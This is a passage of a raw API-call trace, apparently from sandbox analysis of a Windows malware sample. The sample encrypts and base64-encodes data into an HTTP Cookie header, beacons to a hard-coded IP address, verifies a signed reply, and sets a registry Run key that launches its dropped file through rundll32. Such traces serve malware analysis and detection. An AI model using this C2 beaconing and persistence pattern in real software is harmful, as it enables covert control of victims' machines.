ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0543.433] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0543.434] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0543.434] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0543.434] FindClose (in: hFindFile=0x2a83b20 | out: hFindFile=0x2a83b20) returned 1 [0543.434] GetProcessHeap () returned 0x530000 [0543.434] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0543.434] GetProcessHeap () returned 0x530000 [0543.435] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7110 [0543.435] GetProcessHeap () returned 0x530000 [0543.435] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cd2a0 [0543.435] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0543.436] GetProcessHeap () returned 0x530000 [0543.436] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7110 | out: hHeap=0x530000) returned 1 [0543.436] GetProcessHeap () returned 0x530000 [0543.437] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cd2a0 | out: hHeap=0x530000) returned 1 [0543.437] GetProcessHeap () returned 0x530000 [0543.437] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f18 [0543.437] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0543.437] GetProcessHeap () returned 0x530000 [0543.438] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f18 | out: hHeap=0x530000) returned 1 [0543.438] GetProcessHeap () returned 0x530000 [0543.438] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0543.438] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0543.438] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0543.438] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0543.438] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0543.438] GetProcessHeap () returned 0x530000 [0543.438] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0543.438] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0543.438] GetProcessHeap () returned 0x530000 [0543.439] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x58bdf8 [0543.439] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bdf8, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0543.439] GetProcessHeap () returned 0x530000 [0543.439] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0543.439] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bdf8, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf4b4) returned 0x0 [0543.439] GetProcessHeap () returned 0x530000 [0543.439] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xd5) returned 0x2996c80 [0543.439] GetProcessHeap () returned 0x530000 [0543.440] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0543.440] GetProcessHeap () returned 0x530000 [0543.440] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0543.440] CryptBinaryToStringW (in: pbBinary=0x2996c80, cbBinary=0xd5, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0543.440] GetProcessHeap () returned 0x530000 [0543.440] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x23a) returned 0x5edef0 [0543.440] CryptBinaryToStringW (in: pbBinary=0x2996c80, cbBinary=0xd5, dwFlags=0x40000001, pszString=0x5edef0, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTtaHVEextSEyJwAXH3lFCCy/nHLaxyU5ae+2m04wh0y8QKeAhOFYK9tzAqQhxwbpIkXMrqh0", pcchString=0x2cf504) returned 1 [0543.440] GetProcessHeap () returned 0x530000 [0543.440] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0543.440] GetProcessHeap () returned 0x530000 [0543.440] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b63080 [0543.440] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: oetx=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTtaHVEextSEyJwAXH3lFCCy/nHLaxyU5ae+2m04wh0y8QKeAhOFYK9tzAqQhxwbpIkXMrqh0\r\n") returned 299 [0543.440] GetProcessHeap () returned 0x530000 [0543.441] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b63080 | out: hHeap=0x530000) returned 1 [0543.441] GetProcessHeap () returned 0x530000 [0543.441] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5edef0 | out: hHeap=0x530000) returned 1 [0543.441] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0543.441] GetProcessHeap () returned 0x530000 [0543.441] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0543.441] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0543.443] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="NnSPrKLklQWyLpDsOBvayvHYfpr", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0543.443] GetProcessHeap () returned 0x530000 [0543.443] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0543.443] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0543.443] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0543.443] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0543.443] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: oetx=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTtaHVEextSEyJwAXH3lFCCy/nHLaxyU5ae+2m04wh0y8QKeAhOFYK9tzAqQhxwbpIkXMrqh0\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0544.535] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0544.535] GetProcessHeap () returned 0x530000 [0544.535] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0544.535] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x2b4) returned 1 [0544.536] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b480b4, dwNumberOfBytesToRead=0xfd4c, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b480b4*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0544.536] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0544.536] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0544.536] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0544.536] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0544.536] GetProcessHeap () returned 0x530000 [0544.536] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0544.536] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x58bdf8, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x58bdf8, pcbResult=0x2cf51c) returned 0x0 [0544.536] GetProcessHeap () returned 0x530000 [0544.536] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7200 [0544.536] GetProcessHeap () returned 0x530000 [0544.536] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cd2a0 [0544.536] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0544.537] GetProcessHeap () returned 0x530000 [0544.537] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7200 | out: hHeap=0x530000) returned 1 [0544.538] GetProcessHeap () returned 0x530000 [0544.538] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cd2a0 | out: hHeap=0x530000) returned 1 [0544.538] GetProcessHeap () returned 0x530000 [0544.538] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f90 [0544.538] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0544.538] GetProcessHeap () returned 0x530000 [0544.538] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f90 | out: hHeap=0x530000) returned 1 [0544.538] GetProcessHeap () returned 0x530000 [0544.538] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0544.538] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0544.539] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x58be40, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0544.539] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0544.539] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0544.539] GetProcessHeap () returned 0x530000 [0544.539] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0544.539] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0544.539] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x58bdfc, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0544.541] GetProcessHeap () returned 0x530000 [0544.541] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c6a0 [0544.541] GetProcessHeap () returned 0x530000 [0544.541] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0544.541] GetProcessHeap () returned 0x530000 [0544.542] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0544.542] GetProcessHeap () returned 0x530000 [0544.542] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2996c80 | out: hHeap=0x530000) returned 1 [0544.542] GetProcessHeap () returned 0x530000 [0544.543] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0544.543] GetProcessHeap () returned 0x530000 [0544.543] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0544.543] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0544.543] GetProcessHeap () returned 0x530000 [0544.543] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83be0 [0544.543] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",gBenykfa") returned 98 [0544.543] GetProcessHeap () returned 0x530000 [0544.543] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83be0 | out: hHeap=0x530000) returned 1 [0544.543] GetProcessHeap () returned 0x530000 [0544.543] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0544.543] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x648, lpdwDisposition=0x0) returned 0x0 [0544.544] GetProcessHeap () returned 0x530000 [0544.544] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0544.544] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",gBenykfa") returned 98 [0544.544] RegSetValueExW (in: hKey=0x648, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",gBenykfa", cbData=0xc6 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",gBenykfa") returned 0x0 [0544.545] RegCloseKey (hKey=0x648) returned 0x0 [0544.545] GetProcessHeap () returned 0x530000 [0544.545] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c6a0 | out: hHeap=0x530000) returned 1 [0544.545] GetProcessHeap () returned 0x530000 [0544.545] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0544.545] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xdf281) returned 0x102 [0554.555] GetProcessHeap () returned 0x530000 [0554.555] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7200 [0554.555] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0554.555] GetProcessHeap () returned 0x530000 [0554.556] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7200 | out: hHeap=0x530000) returned 1 [0554.556] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0554.556] GetProcessHeap () returned 0x530000 [0554.556] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7200 [0554.556] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0554.556] GetProcessHeap () returned 0x530000 [0554.556] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7200 | out: hHeap=0x530000) returned 1 [0554.556] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83be0 [0554.563] FindNextFileW (in: hFindFile=0x2a83be0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0554.563] FindNextFileW (in: hFindFile=0x2a83be0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0554.563] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0554.563] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0554.563] FindNextFileW (in: hFindFile=0x2a83be0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0554.563] FindClose (in: hFindFile=0x2a83be0 | out: hFindFile=0x2a83be0) returned 1 [0554.564] GetProcessHeap () returned 0x530000 [0554.564] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0554.564] GetProcessHeap () returned 0x530000 [0554.564] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7200 [0554.564] GetProcessHeap () returned 0x530000 [0554.564] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cd2a0 [0554.565] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0554.566] GetProcessHeap () returned 0x530000 [0554.567] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7200 | out: hHeap=0x530000) returned 1 [0554.567] GetProcessHeap () returned 0x530000 [0554.567] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cd2a0 | out: hHeap=0x530000) returned 1 [0554.567] GetProcessHeap () returned 0x530000 [0554.567] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f90 [0554.567] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0554.567] GetProcessHeap () returned 0x530000 [0554.568] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f90 | out: hHeap=0x530000) returned 1 [0554.568] GetProcessHeap () returned 0x530000 [0554.568] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0554.568] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0554.568] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0554.568] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0554.568] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0554.568] GetProcessHeap () returned 0x530000 [0554.569] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0554.569] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0554.569] GetProcessHeap () returned 0x530000 [0554.569] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x58bdf8 [0554.569] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bdf8, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0554.569] GetProcessHeap () returned 0x530000 [0554.569] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0554.569] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bdf8, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf4b4) returned 0x0 [0554.569] GetProcessHeap () returned 0x530000 [0554.569] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x105) returned 0x2a5b260 [0554.570] GetProcessHeap () returned 0x530000 [0554.570] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0554.570] GetProcessHeap () returned 0x530000 [0554.570] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0554.570] CryptBinaryToStringW (in: pbBinary=0x2a5b260, cbBinary=0x105, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0554.570] GetProcessHeap () returned 0x530000 [0554.570] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2ba) returned 0x2a89708 [0554.571] CryptBinaryToStringW (in: pbBinary=0x2a5b260, cbBinary=0x105, dwFlags=0x40000001, pszString=0x2a89708, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePThE4cM0r2lIA92m+3aRIZIZ3c9j2ipvay+tr+jSwlf14mgn/GOze6Nt6eOqhtVwTJNGQxWFUex5l57ixB8DkH3oFQcRQTVw+bZhF9Rr4lIKlWkC4RnBeTOt9gRwhcz/9PgLkb/UD", pcchString=0x2cf504) returned 1 [0554.571] GetProcessHeap () returned 0x530000 [0554.571] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0554.571] GetProcessHeap () returned 0x530000 [0554.571] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b630a8 [0554.571] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: 